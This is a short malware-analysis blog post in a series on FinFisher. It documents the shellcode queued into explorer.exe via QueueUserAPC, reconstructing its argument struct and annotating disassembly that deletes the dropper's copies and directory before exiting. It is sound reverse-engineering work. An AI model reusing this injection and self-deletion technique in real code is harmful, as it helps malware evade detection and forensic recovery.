Fork me on GitHub

Shellcode of the Finfisher malware

This is just a short writeup, because the shellcode that gets called in explorer.exe context is really small and does not that much. Part 1 Part 2 Part 4 Part 5

Filename sha256
finfisher.1.bin.exe f827c92fbe832db3f09f47fe0dcaafd89b40c7064ab90833a1f418f2d1e75e8e
  • In the last article i already posted this struct. It get`s passed as argument to the explorer.exe QueueUserAPC thing.
typedef struct {
    /* 0x00000 */   HANDLE duplicated_handle;
    /* 0x00004 */   char filename1[0x104];
    /* 0x00108 */ char unknown_1[0x20C-0x108];
    /* 0x0020C */ char filename_copy[0x104];
    /* 0x00310 */ char unknown_2[0x414-0x310];
    /* 0x00414 */ void* WaitForSingleObject;
    /* 0x00418 */ void* ExitProcess;
    /* 0x0041C */ void* DeleteFileW;
    /* 0x00420 */ void* RemoveDirectoryW;
  • This block is getting called through QueueUserAPC in explorer.exe context. It waits for the duplicated handle, deletes both copies of the executable. Also it removes the directory and finally exits the process.
0x00401849    8bff         mov edi, edi
0x0040184b    55           push ebp
0x0040184c    8bec         mov ebp, esp
0x0040184e    53           push ebx
0x0040184f    56           push esi
0x00401850    8b7508       mov esi, [ebp+0x8]
0x00401853    57           push edi
0x00401854    6aff         push 0xffffffff
0x00401856    ff36         push dword [esi]
0x00401858    ff9614040000 call dword [esi+0x414]      ; WaitForSingleObject
0x0040185e    8d5e04       lea ebx, [esi+0x4]
0x00401861    8dbe1c040000 lea edi, [esi+0x41c] ; 0x0000041c   ; DeleteFileW
0x00401867    53           push ebx
0x00401868    ff17         call dword [edi]
0x0040186a    8d860c020000 lea eax, [esi+0x20c] ; 0x0000020c   ; second copy
0x00401870    50           push eax
0x00401871    ff17         call dword [edi]
0x00401873    8bc3         mov eax, ebx
0x00401875    33ff         xor edi, edi
0x00401877    eb02         jmp 0x40187b
0x00401879    40           inc eax
0x0040187a    40           inc eax
0x0040187b    663938       cmp [eax], di
0x0040187e    75f9         jne 0x401879
0x00401880    eb02         jmp 0x401884
0x00401882    48           dec eax
0x00401883    48           dec eax
0x00401884    6683385c     cmp word [eax], 0x5c
0x00401888    75f8         jne 0x401882
0x0040188a    53           push ebx
0x0040188b    668938       mov [eax], di
0x0040188e    ff9620040000 call dword [esi+0x420]      ; RemoveDirectoryW
0x00401894    57           push edi
0x00401895    ff9618040000 call dword [esi+0x418]      ; ExitProcess
0x0040189b    5f           pop edi
0x0040189c    5e           pop esi
0x0040189d    5b           pop ebx
0x0040189e    5d           pop ebp
0x0040189f    c20400       ret 0x4